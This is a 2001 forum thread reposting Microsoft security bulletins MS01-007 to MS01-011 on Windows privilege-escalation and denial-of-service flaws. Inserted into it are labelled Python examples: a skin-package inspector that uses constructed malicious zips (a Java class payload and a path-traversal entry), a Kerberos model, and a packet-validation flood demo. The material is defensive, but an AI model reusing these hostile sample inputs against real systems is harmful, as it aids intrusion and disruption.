Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Patch Availability
Microsoft Windows NT 4.0 Workstation, Server, and Enterprise Edition: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27804
Microsoft Windows NT 4.0 Server, Terminal Server Edition:
(will be available shortly)
NOTE: This patch may be applied to Windows NT 4.0 Service Pack 6a.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-008, http://www.microsoft.com/technet/security/bulletin/fq01-008.asp
Microsoft Knowledge Base article Q280119 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments:
Microsoft thanks Todd Sabin of Bindview's RAZOR team ( http://razor.bindview.com ) for reporting this issue to us and working with us to protect customers.
Revisions:
February 07, 2001: Bulletin Created.
socalgal
02-09-2001, 07:21 PM
Microsoft Security Bulletin (MS01-007)
Patch Available for “Network DDE Agent Request” Vulnerability
Originally posted: February 05, 2001
Revised: February 09, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows® 2000. The vulnerability could, under certain conditions, allow an attacker to gain complete control over an affected machine.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-007.asp
Issue:
Network Dynamic Data Exchange (DDE) is a technology that enables applications on different Windows computers to dynamically share data. This sharing is effected via communications channels called trusted shares, which are managed by a service called the Network DDE Agent. By design, processes on the local machine can levy requests upon the Network DDE Agent, including ones that indicate what application should be run in conjunction with a particular trusted share. However, a vulnerability exists because, in Windows 2000, the Network DDE Agent runs using the Local System security context and processes all requests using this context, rather than that of the user. This would give an attacker an opportunity to cause the Network DDE Agent to run code of her choice in Local System context, as a means of gaining complete control over the local machine.
In order to exploit this vulnerability, the attacker would need the ability to run a program on an affected machine that would levy the appropriate requests. However, best practices strongly recommend against ever allowing unprivileged users to run code on security-critical machines such as domain controllers and other servers; if these recommendations have been followed, such machines would not be at risk. As a result, workstations and terminal servers are likely to be the machines primarily affected by the vulnerability. This would tend to limit the damage that could be done via this vulnerability because, in most cases, even gaining complete control of either type of machine would not convey any additional privileges on the domain.
Microsoft recommends that customers using Windows 2000 workstations or who allow unprivileged users to run code on Windows 2000 servers apply the patch immediately. In addition, customers operating Windows 2000 web servers should consider applying the patch to those machines as well, as a precautionary measure. If an attacker were able to gain the ability to run code in a restricted context on a web server via another vulnerability, this vulnerability would provide a way to immediately elevate her privileges and cause broader damage.
Affected Software Versions:
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Patch Availability: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27526
Note: This patch can be installed on systems running Windows 2000 Gold, Service Pack 1, and Service Pack 2. It will be included in Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-007, http://www.microsoft.com/technet/security/bulletin/fq01-007.asp
Microsoft Knowledge Base article Q285851 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Dildog of @Stake ( http://www.atstake.com ) for reporting this issue to us and working with us to protect customers.
Revisions:
February 05, 2001: Bulletin Created.
February 09, 2001: Bulletin revised to provide updated information regarding terminal servers. Contrary to the original version of the bulletin, terminal servers are affected by the vulnerability.
socalgal
02-13-2001, 08:14 PM
Microsoft Security Bulletin (MS01-009)
Patch Available for “Malformed PPTP Packet Stream” Vulnerability
Originally posted: February 13, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows NT® 4.0 servers that provide secure remote sessions. The vulnerability could allow an attacker to prevent an affected machine from providing useful service.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-009.asp
Issue:
The PPTP service in Windows NT 4.0 has a flaw in a part of the code that handles a particular type of data packet, which results in a leak of kernel memory. If a sufficient number of packets containing a specific malformation were received by an affected server, kernel memory would eventually become exhausted. The likely outcome would be that the server would either hang or fail altogether. In either case, the machine would need to be rebooted to restore normal operation, and any PPTP sessions underway at the time would be lost. It would not be necessary for the attacker to establish a valid PPTP session in order to exploit the vulnerability.
The vulnerability does not threaten the security of the data within PPTP sessions in any way – it is strictly a denial of service vulnerability. Only machines running the PPTP service would be affected by this vulnerability (the service does not run by default). Windows 2000 machines, even ones running PPTP, would not be affected by this vulnerability.
Affected Software Versions:
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Patch Availability:
Windows NT 4.0 Server and Windows NT 4.0 Server, Enterprise Edition: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27836
Windows NT 4.0 Server, Terminal Server Edition:
To be released shortly.
Note: This patch can be applied to systems running Windows NT 4.0 Service Pack 6a. The fix will be included in Windows NT 4.0 Service Pack 7.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-009, http://www.microsoft.com/technet/security/bulletin/fq01-009.asp
Microsoft Knowledge Base article Q283001 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments:
Microsoft thanks Kirk Corey of Diversified Software Industries, Inc. (www.dsi-inc.net) for reporting this issue to us and working with us to protect customers.
Revisions:
February 13, 2001: Bulletin Created.
socalgal
02-15-2001, 07:34 AM
Microsoft Security Bulletin (MS01-010)
Patch Available for "Windows Media Player Skins File Download" Vulnerability
Originally posted: February 14, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows Media™ Player 7. This vulnerability could potentially enable a malicious user to cause a program of his choice to run on another user’s computer.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-010.asp
Issue:
Windows Media Player 7 introduced a feature called "skins" that allows customization of the look and feel of Windows Media Player. If a Windows Media Player skin (.WMZ) file were downloaded from a malicious web site it could potentially be used to run Java code to read and browse files on a local machine. The vulnerability stems from the fact that "skins" are downloaded to a known location on a victim's computer and are stored in a .zip package. If the .zip package contained a Java class (.class) file, any Java code in this class could be executed under the local computer security zone.
If a Windows Media Player skin (.WMZ) file were downloaded from a malicious web site, it could potentially cause the deployment of zipped Java code to a known location on the visiting user’s machine. Since the Java code would reside in a known location on the machine, script hosted on a hostile web site or embedded in a hostile HTML mail message could potentially invoke the script in the local computer security zone to take arbitrary action on the user’s machine.
Affected Software Versions:
Microsoft Windows Media Player 7
Patch Availability:
Microsoft Windows Media Player 7: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27961
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-010, http://www.microsoft.com/technet/security/bulletin/fq01-010.asp
Microsoft Knowledge Base article Q287045 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions:
February 14, 2001: Bulletin Created.
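As an added example (not code from the bulletin or from Windows Media Player), the check below inspects a skin package before it is unpacked to its known location: it rejects entries outside an assumed allow-list of skin content types, sniffs for Java class files hidden under an allowed name, and, going one step beyond the bulletin, refuses entries whose paths would escape the target directory. The sample packages are constructed inline.

```python
"""Inspect a Windows Media Player skin package (.WMZ, a .zip) before it is
unpacked to a known location, rejecting entries that are not skin content.

Added example, not part of the bulletin or of Windows Media Player. The
allow-listed extensions are an assumption about what a skin needs.
"""
import io
import zipfile
from pathlib import PurePosixPath
from typing import List, Sequence, Tuple

# Assumed allow-list of skin content types; adjust to local policy.
ALLOWED_EXTENSIONS = {".wms", ".js", ".bmp", ".gif", ".jpg", ".jpeg", ".png"}
JAVA_CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # first four bytes of every .class file


def inspect_skin(wmz_bytes: bytes) -> List[str]:
    """Return a list of findings; an empty list means the package is acceptable."""
    findings: List[str] = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(wmz_bytes))
    except zipfile.BadZipFile:
        return ["not a zip archive"]
    with archive:
        for info in archive.infolist():
            name = info.filename
            path = PurePosixPath(name.replace("\\", "/"))
            # Entries must stay inside the extraction directory.
            if path.is_absolute() or ".." in path.parts:
                findings.append(f"{name}: path escapes the skin directory")
                continue
            if info.is_dir():
                continue
            if path.suffix.lower() not in ALLOWED_EXTENSIONS:
                findings.append(f"{name}: extension {path.suffix or '(none)'} not allowed")
            # Content check catches a class file hiding under an allowed name.
            with archive.open(info) as member:
                if member.read(4) == JAVA_CLASS_MAGIC:
                    findings.append(f"{name}: Java class file content")
    return findings


def _make_zip(entries: Sequence[Tuple[str, bytes]]) -> bytes:
    """Build an in-memory zip from (name, bytes) pairs (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries:
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: a plain skin and one carrying unexpected content.
BENIGN_SKIN = _make_zip([
    ("skin.wms", b"<THEME><VIEW/></THEME>"),
    ("art/background.png", b"\x89PNG\r\n\x1a\n"),
])
HOSTILE_SKIN = _make_zip([
    ("skin.wms", b"<THEME><VIEW/></THEME>"),
    ("Loader.class", JAVA_CLASS_MAGIC + b"\x00\x00\x00\x31"),
    ("art/logo.gif", JAVA_CLASS_MAGIC + b"\x00\x00\x00\x31"),  # class bytes, allowed name
    ("../startup.js", b"// would land outside the skin directory"),
])

if __name__ == "__main__":
    print("benign:", inspect_skin(BENIGN_SKIN))
    print("hostile:", inspect_skin(HOSTILE_SKIN))
```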
socalgal
02-20-2001, 08:50 PM
Microsoft Security Bulletin (MS01-011) (http://www.microsoft.com/technet/security/bulletin/MS01-011.asp)
Malformed Request to Domain Controller can Cause Denial of Service
Originally posted: February 20, 2001
Summary:
Who should read this bulletin: System administrators
Impact of vulnerability: Denial of service
Recommendation: Install patch on domain controllers
Affected Software:
Microsoft® Windows® 2000 Server
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Technical details <linked in bulletin>
Technical description:
A core service running on all Windows 2000 domain controllers (but not on any other machines) contains a flaw affecting how it processes a certain type of invalid service request. Specifically, the service should handle the request at issue here by determining that it is invalid and simply dropping it; in fact, the service performs some resource-intensive processing and then sends a response.
If an attacker sent a continuous stream of such requests to an affected machine, it could consume most or all of the machine’s CPU availability. This could cause the domain controller to process requests for service slowly or not at all, and could limit the number of new logons the machine could process and the number of Kerberos tickets that could be issued.
Mitigating factors:
The machine would automatically resume normal processing as soon as the stream of requests ceased.
Although the attacker could, in theory, use the vulnerability to completely deny service to network users, in practice the attack rarely consumes more than 75% of the available CPU resources.
Users who were already logged on and were using previously issued tickets would not be affected by domain controller unavailability.
If there were multiple domain controllers on the domain, the unaffected machines could pick up the other machine’s load.
If normal security practices have been followed, Internet users would be prevented by firewalling and other measures from levying requests directly to domain controllers.
Vulnerability identifier: CAN-2001-0018
Frequently asked questions: <linked in bulletin>
What’s the scope of the vulnerability?
This is a denial of service vulnerability. By sending a continuous stream of specially malformed packets to a domain controller, an attacker could consume most or all of the machine’s resources, potentially preventing it from authenticating users. In the worst case, the net result could be that new users might be unable to log on, and logged-on users might be unable to use some network resources.
The effects of the attack would not be permanent, and normal processing would resume once the stream of packets was stopped. If there were multiple domain controllers on a domain, the other machines would assume part of the affected machine’s load. Also, if best practices have been followed, the vulnerability could only be exploited by a user within the network -- the ports used in this attack should be blocked at the firewall.
What causes the vulnerability? <linked in bulletin>
This vulnerability results because one of the services used by Windows 2000 domain controllers doesn’t appropriately validate requests before processing them. In at least one case, the service would attempt to process an invalid request, rather than simply discarding it. This processing is fairly resource-intensive.
What could an attacker do via this vulnerability?
By sending the domain controller a continuous stream of specially selected invalid requests, an attacker could disrupt service on the machine. Specifically, she could cause the machine to devote most or all of its resources to responding to invalid requests, which would cause the machine’s response to other, valid requests to slow or stop altogether.
If a domain controller’s resources were monopolized in this fashion, what would be the effect?
Let’s consider the worst case, in which there’s only a single domain controller in the domain, and the attacker manages to use 100% of the machine’s resources. In this case, the principal effect of a successful attack via this vulnerability would be to prevent the domain controller from logging new users onto the domain, and to prevent the machine from fulfilling queries to the Active Directory.
Would an attack prevent previously logged-on users from using network resources?
Not necessarily. Recall that Windows 2000 uses Kerberos as its default authentication protocol. In Kerberos, the domain controller does not authenticate every use of a network resource; instead it issues a reusable ticket the first time a user requests a particular resource. When the user subsequently uses that resource, the domain controller does not need to be involved in the authentication. This means that even in the case of a successful attack, users would be able to continue using any resources for which they already held tickets, but they might be unable to obtain new tickets for other resources.
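The ticket-reuse behaviour described above, as an added example that is not part of the bulletin: a deliberately simplified model of a KDC and a client with a ticket cache (no cryptography, constructed principal and service names, and an `overloaded` flag standing in for the attacker's packet stream). It shows why a client can keep using a resource it already holds a ticket for while the domain controller is saturated, but cannot obtain a new ticket or complete a fresh logon until the attack stops.

```python
"""Toy model of Kerberos ticket caching under a KDC resource-exhaustion attack.

This is an illustration written for this page, not Microsoft's code and not a
real Kerberos implementation: tickets carry no keys or signatures, and the
"overloaded" flag simply models the KDC being unable to answer.
"""
import time
from dataclasses import dataclass, field


class KdcUnavailable(Exception):
    """Raised when the simulated KDC cannot answer an AS or TGS request."""


@dataclass(frozen=True)
class Ticket:
    principal: str
    service: str        # "krbtgt" for the TGT, otherwise the service name
    expires_at: float


@dataclass
class Kdc:
    users: dict                      # principal -> password (constructed sample data)
    ticket_lifetime: float = 600.0
    overloaded: bool = False         # True while the attacker's packet stream runs
    tgs_requests: int = 0            # how many TGS round trips clients needed

    def authenticate(self, principal, password):
        """AS exchange: returns a TGT, or fails if the KDC is saturated."""
        if self.overloaded:
            raise KdcUnavailable("AS exchange: domain controller not responding")
        if self.users.get(principal) != password:
            raise PermissionError("bad credentials")
        return Ticket(principal, "krbtgt", time.time() + self.ticket_lifetime)

    def issue_service_ticket(self, tgt, service):
        """TGS exchange: trades a valid TGT for a service ticket."""
        self.tgs_requests += 1
        if self.overloaded:
            raise KdcUnavailable("TGS exchange: domain controller not responding")
        if tgt is None or tgt.service != "krbtgt" or tgt.expires_at < time.time():
            raise PermissionError("invalid or expired TGT")
        return Ticket(tgt.principal, service, time.time() + self.ticket_lifetime)


@dataclass
class Client:
    kdc: Kdc
    principal: str
    tgt: Ticket = None
    cache: dict = field(default_factory=dict)   # service -> cached Ticket

    def logon(self, password):
        self.tgt = self.kdc.authenticate(self.principal, password)

    def access(self, service):
        """True if the client can present a valid ticket for `service`.

        A cached, unexpired ticket is reused without contacting the KDC; only
        a cache miss (or an expired ticket) requires a TGS round trip.
        """
        ticket = self.cache.get(service)
        if ticket is None or ticket.expires_at < time.time():
            ticket = self.kdc.issue_service_ticket(self.tgt, service)
            self.cache[service] = ticket
        return ticket.principal == self.principal and ticket.service == service


def simulate_dos():
    """Walk through the scenario in the bulletin and report each outcome."""
    kdc = Kdc(users={"alice": "s3cret", "bob": "hunter2"})   # constructed accounts
    alice = Client(kdc, "alice")
    alice.logon("s3cret")
    alice.access("cifs/fileserver")      # normal operation: ticket issued and cached

    kdc.overloaded = True                # attacker's stream of invalid requests begins
    results = {"cached_resource_ok": alice.access("cifs/fileserver")}
    try:                                 # a resource Alice has no ticket for yet
        results["new_resource_ok"] = alice.access("ldap/dc01")
    except KdcUnavailable:
        results["new_resource_ok"] = False
    bob = Client(kdc, "bob")
    try:                                 # a user who was not logged on
        bob.logon("hunter2")
        results["new_logon_ok"] = True
    except KdcUnavailable:
        results["new_logon_ok"] = False

    kdc.overloaded = False               # stream stops: normal processing resumes
    bob.logon("hunter2")
    results["logon_after_attack_ok"] = bob.access("cifs/fileserver")
    results["tgs_round_trips"] = kdc.tgs_requests
    return results


if __name__ == "__main__":
    for key, value in simulate_dos().items():
        print(f"{key}: {value}")
```

The `tgs_round_trips` count makes the point explicit: Alice's second access to the file server costs no KDC traffic at all, which is exactly why already-authenticated users keep working during the attack.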
Could this vulnerability cause the domain controller to fail?
No. There is no capability to cause either the machine or the affected service to fail via this vulnerability. This is strictly a denial of service attack effected via resource consumption.
Does the vulnerability always enable the attacker to monopolize all of the machine’s resources?
No. In our tests, we were rarely able to drive CPU utilization higher than 75%.
What if the domain had several domain controllers?
In domains that contain multiple domain controllers, the machines work together and shift their workloads dynamically. The more domain controllers there are in a single domain, the less noticeable the loss of a single one would be.
Couldn’t I just disable the service that contains the flaw?
No. The affected service is one of the core services on domain controllers and cannot be disabled.
This sounds like a flooding attack, rather than a true security vulnerability. Is it?
There are some similarities between this vulnerability and a flooding attack; for instance, the attack would only persist until the attacker stopped sending requests to the affected machine. Typically, we do not issue patches for flooding attacks. However, in this case, we decided to treat this issue as a vulnerability for two reasons:
1. There are elements of this issue that aren't like normal flooding attacks. Specifically, a flooding attack usually involves legitimate requests that happen to be resource-intensive to process. In this case, the requests are invalid and the service should discard them after only a cursory inspection.
2. The machines affected by this vulnerability are domain controllers. Because of the centrality of domain controllers to a network, we chose to err on the side of caution and produce a patch.
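The root cause described under "What causes the vulnerability?" and restated in reason 1 above is a general pattern: expensive processing that runs before cheap structural validation. The following is an added example, not the affected service's code or protocol; the wire format (a 4-byte magic, a 2-byte length and a payload) and the hashing loop that stands in for "resource-intensive processing" are constructed for illustration. It feeds the same stream of mostly malformed packets to a handler that validates late and to one that validates first, and counts how often the expensive work actually runs.

```python
"""Late validation (the flawed pattern) versus fail-fast validation.

Illustration written for this page; the request format, the handlers and the
"expensive" work are constructed and are not the affected Windows 2000 service.
"""
import hashlib
import struct

# Constructed wire format: 4-byte magic | 2-byte big-endian payload length | payload
MAGIC = b"REQ1"
HEADER = struct.Struct(">4sH")
MAX_PAYLOAD = 1024

expensive_calls = {"vulnerable": 0, "hardened": 0}   # how often the costly path ran


def expensive_processing(data: bytes) -> bytes:
    """Stand-in for resource-intensive work (iterated hashing)."""
    digest = data
    for _ in range(1000):
        digest = hashlib.sha256(digest).digest()
    return digest


def parse(packet: bytes):
    """Cheap structural validation: return the payload, or None if malformed."""
    if len(packet) < HEADER.size:
        return None
    magic, length = HEADER.unpack_from(packet)
    if magic != MAGIC or length > MAX_PAYLOAD or len(packet) != HEADER.size + length:
        return None
    return packet[HEADER.size:]


def handle_vulnerable(packet: bytes):
    """Flawed pattern: spends the resources first, rejects the request afterwards."""
    expensive_calls["vulnerable"] += 1
    result = expensive_processing(packet)       # cost paid for every packet
    return result if parse(packet) is not None else None


def handle_hardened(packet: bytes):
    """Fail-fast pattern: invalid requests are discarded after a cursory check."""
    payload = parse(packet)
    if payload is None:
        return None                             # nothing expensive has run
    expensive_calls["hardened"] += 1
    return expensive_processing(payload)


def build(magic=MAGIC, length=None, payload=b"hello"):
    """Build a packet; pass a wrong magic or length to make it malformed."""
    length = len(payload) if length is None else length
    return HEADER.pack(magic, length) + payload


def flood(handler, packets):
    """Feed a packet stream to a handler; return the number accepted."""
    return sum(1 for p in packets if handler(p) is not None)


def demo():
    """One valid request buried in 300 malformed ones, sent to both handlers."""
    for key in expensive_calls:
        expensive_calls[key] = 0
    stream = ([build()]                              # the single valid request
              + [build(magic=b"XXXX")] * 100          # wrong magic
              + [build(length=60000)] * 100           # absurd length field
              + [build(length=2)] * 100)              # length disagrees with packet
    accepted = (flood(handle_vulnerable, stream), flood(handle_hardened, stream))
    return {"accepted": accepted,
            "expensive_calls": (expensive_calls["vulnerable"],
                                expensive_calls["hardened"])}


if __name__ == "__main__":
    print(demo())
```

Both handlers accept exactly the same requests; the difference is entirely in what the 300 invalid packets cost, which is the distinction reason 1 draws between a flooding attack and this vulnerability.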
Could this vulnerability be exploited from the Internet?
If normal security practices have been followed, this vulnerability could only be exploited from within the network. Typically, domain controllers are not used as network edge machines, and firewalling is used to prevent users outside the network from levying any requests directly upon them. If these practices have been followed, Internet users would not be able to send the malformed request to the affected service, and as a result they would be unable to exploit the vulnerability.
Does this vulnerability affect Windows NT® 4.0 domain controllers?
No. Only Windows 2000 domain controllers are affected.
Does this vulnerability affect Windows 2000 workstations or member servers?
No. It only affects domain controllers.
Who should use the patch?
Microsoft recommends that customers consider installing the patch on their Windows 2000 domain controllers.
What does the patch do?
The patch eliminates the vulnerability by causing the affected service to correctly treat as invalid the request at issue here.
Patch availability:
Download locations for this patch:
Microsoft Windows 2000 Server and Advanced Server: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28064
Microsoft Windows 2000 Datacenter Server:
Patches for Windows 2000 Datacenter Server are hardware-specific and available from the original equipment manufacturer.
Additional information about this patch
Installation platforms:
This patch can be installed on systems running Windows 2000 Gold, Service Pack 1 or Service Pack 2.
Inclusion in future service packs:
The fix for this issue will be included in Windows 2000 Service Pack 3.
Verifying patch installation:
To verify that the patch has been installed on the machine, confirm that the following registry key has been created on the machine:
Localization:
Localized versions of this patch are under development. When completed, they will be available at the locations discussed in "Obtaining other security patches".
Obtaining other security patches:
Patches for other security issues are available from the following locations:
Security patches are available from the Microsoft Download Center, and can be most easily found by doing a keyword search for "security_patch".
Patches for consumer platforms are available from the WindowsUpdate web site.
All patches available via WindowsUpdate also are available in a redistributable form from the WindowsUpdate Corporate site.
Other information:
Support:
Microsoft Knowledge Base article Q287397 discusses this issue and will be available approximately 24 hours after the release of this bulletin. Knowledge Base articles can be found on the Microsoft Online Support web site.
Technical support is available from Microsoft Product Support Services. There is no charge for support calls associated with security patches.
Security Resources: The Microsoft TechNet Security Web Site provides additional information about security in Microsoft products.
Disclaimer:
The information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.